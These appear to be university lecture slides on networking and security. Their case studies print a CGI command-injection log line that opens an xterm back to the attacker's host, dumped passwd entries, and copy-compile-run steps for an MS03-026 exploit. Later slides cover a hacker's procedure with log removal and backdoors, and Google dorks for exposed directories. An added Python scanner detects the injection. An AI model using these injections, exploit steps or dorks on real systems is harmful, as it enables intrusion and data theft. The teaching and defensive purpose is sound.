Computer Networking and Security
RUDI LUMANTO
ASSESSMENT CRITERIA
- Assignments
SYLLABUS
- Overview
- Network standards (OSI)
- Network components
- Network protocol (TCP/IP)
- Network OS and services
- Network/Internet security
SYLLABUS (continued)
- Software threats: virus, worm, etc.
- Internet threats: TCP attack, DNS, DoS, etc.
- Firewall and Intrusion Detection System (IDS)
- Cryptography and its applications
- VPN
COMPUTER NETWORKING and SECURITY OVERVIEW
Network security standards
Network components
Protocol (TCP/IP)
Software threats: virus, worm, etc.
Network OS and services
Cryptography and applications
VPN
1. OVERVIEW
Outline
- Simple
A Security Case
A company called Acme-art Inc. does online business on the internet. They
have a database that records all customer information, including their credit card
information, and it is connected to their site www.acme-art.com, which is protected
by a firewall.
On 31 October 2001 a hacker intruded into their system and stole all the credit card information,
then posted the information to a Usenet newsgroup. A few hours later the company had
lost millions of dollars and its reputation, and had to invest much more money to keep its
business alive.
What happened?
How could it happen?
Sample case 1
Sample case 1: Browsing.
Sample case 1: Part C in the log file
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
Trying direct access. Error response.
Sample case 1: Attacking security hole 1
Perl script
Security hole 1: the form parameter variable is transferred to the index.cgi script without validation.
Sample case 1: Attacking security hole 1
Passwd file
root:x:0:0:root:/root:/bin/bash
Lion:x:500:500::/home/lion:/bin/bash
Sample case 1: Attacking security hole 2
Direct execution of server commands
Sample case 1
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
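A defender-side check for the two holes in this case, added here as an example and not part of the original slides: it parses Apache common-log lines, URL-decodes the query string (the `%26` in the request above becomes `&`), flags any parameter carrying shell metacharacters, and shows the allow-list test that index.cgi should have applied to `page` before using it. The sample log (the case's two lines plus one constructed benign request), the regexes and the function names are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample: the two access-log lines from the Acme-art case plus one benign request.
SAMPLE_LOG = """\
10.0.1.21 - - [31/Oct/2001:03:03:41 +0530] "GET /cgi-bin/ HTTP/1.0" 403 272
10.0.1.21 - - [31/Oct/2001:03:17:29 +0530] "GET /index.cgi?page=|xterm+display+10.0.1.21:0.0+%26| HTTP/1.0" 200 1228
10.0.1.55 - - [31/Oct/2001:03:20:10 +0530] "GET /index.cgi?page=about.html HTTP/1.0" 200 2048
"""

# Apache common log format: host ident user [time] "method path proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+$'
)

# Characters that let a CGI parameter escape into a shell (e.g. a Perl open() with a pipe).
SHELL_META = re.compile(r'[|;&`$]')

# Allow-list for the `page` parameter: a plain HTML file name, no separators or metacharacters.
SAFE_PAGE = re.compile(r'^[A-Za-z0-9_-]+\.html$')


def parse_line(line):
    """Return the fields of one common-log line, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(path):
    """Return (name, decoded value) pairs whose decoded value contains shell metacharacters."""
    query = urlsplit(path).query
    # parse_qsl decodes percent-escapes and turns '+' into a space, so %26 is checked as '&'
    return [(name, value) for name, value in parse_qsl(query, keep_blank_values=True)
            if SHELL_META.search(value)]


def is_valid_page(value):
    """The check index.cgi should apply before opening the file named by `page`."""
    return SAFE_PAGE.fullmatch(value) is not None


def scan_log(text):
    """Scan log text and return one alert per request with a suspicious parameter."""
    alerts = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        hits = suspicious_params(rec["path"])
        if hits:
            alerts.append({"host": rec["host"], "time": rec["time"],
                           "status": rec["status"], "params": hits})
    return alerts
```

A 200 status on an alert means the injected command ran; the same rule fed from the live access log is the detection the case lacked, and `is_valid_page` is the validation that closes hole 1.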
Information/technique behind the case
- Understanding
Figure: directory layout of host Lisv01: / (root) containing home, var, sbin, bin, etc, dev and usr, with public_html, /var/www/html, /var/log/httpd, /etc/httpd/conf/httpd.conf and /etc/init.d/httpd beneath them.
*Document root: the directory that holds HTML documents.
Figure: web application execution models (WWW browser, Internet/Intranet, WWW server and its server software).
- Network-loading application: HTML & script (JavaScript); the browser executes the application.
- Java Applet, ActiveX: the browser executes the downloaded application.
- Server-side application: CGI, Active Server Pages; the server software executes the application.
Sample case 2
Security team investigation: looking for clues by social engineering
One new employee installed Windows 2000 Server on his computer and connected it to
the LAN with a global IP address.
Other clues:
Nessus report on the Windows 2000 Server after IIS installation
Address of Host    Port/Service
192.168.27.31      ftp (21/tcp)
192.168.27.31      smtp (25/tcp)
192.168.27.31      http (21/tcp)
192.168.27.31      nntp (119/tcp)
192.168.27.31      msrpc (135/tcp)
192.168.27.31      netbios-ssn (139/tcp)
192.168.27.31      https (443/tcp)
192.168.27.31      microsoft-ds (445/tcp)
STMIK NUSA MANDIRI, November 2008
Sample case 2
msrpc (135/tcp)
Warning
The remote host is running a version of Windows which has a flaw in its
RPC interface which may allow an attacker to execute arbitrary code
and gain SYSTEM privileges. There is at least one worm which is
currently exploiting this vulnerability, namely the MsBlaster worm.
Solution: see
http://www.microsoft.com/technet/security/bulletin/MS03-026.mspx
Risk factor: high
CVE: CAN-2003-0352
BID: 8205
Other references: IAVA:2003-A-0011
NESSUS ID: 11806
msrpc (135/tcp)
Sample case 2
NESSUS ID: identity number of the vulnerability check by Nessus
BID: Bugtraq ID: related documentation regarding the vulnerability, including
exploit code; see the SecurityFocus site
Simulation
1. Downloading the exploit code source file (from the SecurityFocus site or the Whoppix CD)
$cp /KNOPPIX/pentest/exploits/securityfocus/8205/oc192-dom.c
2. Compiling the source file
$gcc oc192-dom.c
3. Executing the exploit against the target machine's IP
$a.out -d 192.168.94.204
Get the system access
C:>WINNT\SYSTEM32\
Information/technique behind the case
- Understanding about the network
- Insufficient security orientation for new employees
- Lack of knowledge about the OS
- There is always exploit code on the internet
- Lack of information about updates
1. File sharing: allows access to a file at any time and from anywhere
2. Effective data transfer: data is sent quickly and efficiently
3. Hardware sharing: one printer, hard disk, etc. can be used jointly
4. Realtime communication: communication via text, audio, images or video in real time
5. Operational cost reduction: reduces the cost of telephone calls, paper use, mailing, etc.
The data transmission speed is tens to several hundred Mbps. For example, an A4 sized document
(30 Kbytes) can be transmitted over a LAN in 0.024 second.
bps (bits per second) = the unit rate at which data can be transmitted over a communication line, expressed
as the number of bits transmitted per second. 9600 bps means 9600 bits are transmitted in one
second.
Hardware sharing
Type of Network
Mainly divided into 2 types based on their scale (the area that a network covers).
LAN is implemented within a building or factory.
WAN is implemented by connecting two or more LANs between offices and laboratories, or between two countries.
To protect company/individual assets:
hardware, software and INFORMATION (data, ability and reputation)
To comply with regulatory requirements
To keep your job
Confidentiality
Integrity
Availability
- Stand-alone threats
- Connection threats
Falsification
Denial of service
Impersonation
Attack platform
Vulnerabilities
Weakness in the design, configuration or implementation of a computer system that
renders it susceptible to a threat.
1. POOR DESIGN
Hardware and software systems that contain design flaws that can be exploited.
Ex: sendmail flaws in early versions of Unix that allowed hackers to gain privileged root access.
2. POOR IMPLEMENTATION
Systems that are incorrectly configured because of inexperience, insufficient
training or sloppy work. Ex: a system that does not have restricted access
privileges on critical executable files.
3. POOR MANAGEMENT
Inadequate procedures and insufficient checks and balances.
Ex: no documentation and monitoring
Types of Vulnerability (table columns: OS/Program name, Cause, Influence)
OS/Program name: Telnetd; sadmind (Solaris 2.3-7); dtspcd (AIX 4.3/5.1, HP-UX 11.11, Solaris 8, etc.); IIS4.0 (Windows NT); IIS5.0 (Windows 2000)
Influence: permission (normally root) seized by an outsider; arbitrary command executable with root permission by an outsider; operation permission (normally root) seized by an outsider; execution permission (normally root) seized by an outsider
ATTACKS
A specific technique used to exploit a vulnerability.
Ex: a threat could be a denial of service, a vulnerability is in the design of the OS, and an attack could be
a ping of death.
- Passive attacks: gathering information by monitoring and recording traffic on the network, or by social engineering. Ex: packet sniffing, traffic analysis
- Active attacks: denial of service
Figure: denial of service: the attack platform starts the attack against the target host, whose service is downed due to overload.
Security Prevention
What is Security?
Definitions from the American Heritage Dictionary:
- Freedom from risk or danger: safety
- Measures adopted to prevent a crime.
Computer Security Measures
- Mechanisms to prevent, detect and recover from threats and attacks, or for auditing purposes.
Key point
Computer security is not only a technical problem; it is a business and people problem.
The technology is the easy part; the difficult part is developing security policies/plans
that fit the organization's business operation and getting people to comply with the plan.
Social engineering: non-technical methods hackers employ to gain access to a system; refers to the process of convincing a person to reveal information.
Security operations
- Prevention against accidental capture or modification of information
Types of Users
Hacker
Cracker
Script kiddy
Figure: a corporate network facing intrusion, subversion and sabotage.
Vulnerability
Subversion, sabotage
/etc/passwd file
File editing/falsification
b0ed782bbd4c8445f07538a3ede788eb
Countermeasures against hacking (server/client, Internet)
Network security: router (filtering), firewall (VPN), N-IDS, vulnerability audit
Server security: H-IDS, log monitoring, falsification prevention, vulnerability audit
Miscellaneous: virus scan, encryption; virus scan, encryption (SSH)
Firewall?
Figure: Internet and Intranet separated by a firewall: public WWW server (HTTP), public FTP server (FTP), HTTP client, unspecified application server and client, authentication.
Packet filtering
GW type firewall
Application gateway
Stateful inspection
Encryption
Figure: encrypted communication between two FW/VPN routers across the Internet (Provider A, Provider B, Provider C, Provider D, IX).
Making a good security policy
Test/Ethical Hacking
Trinity
- Security goals
- Focus on the target
- Never use your own information
- Never leave your footsteps
- Can always come back again
HACKERS' PROCEDURE
Hackers' procedure/steps
1. Information gathering: targeting, scanning
2. Attack, intrusion: remote attack, local attack
3. Unauthorized act
4. Actions taken after the unauthorized act: log removing/deception, space using, time stamp, back door
Example of Targeting
All information about the target
Google hacking
- Mastering Google using its standard options:
intitle:
inurl:
intext:
filetype:
phonebook: search telephone numbers, e.g. phonebook: John Doe CA
Combining Google options in queries
Several alternate queries that provide more accurate results:
intitle:index.of "parent directory"
intitle:index.of name size
These queries provide directory listings by not only focusing on index.of in the title, but on keywords often found
inside directory listings, such as parent directory, name, and size.
Obviously, this search can be combined with other searches
to find files or directories located in directory listings.
Example:
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data
Name Last modified Size Description Parent Directory intitle:"Index of" intitle:"data intitle:bbs
bbs.dat inurl:"Index of" intitle:Index of
THANK YOU
The Dawn of the Net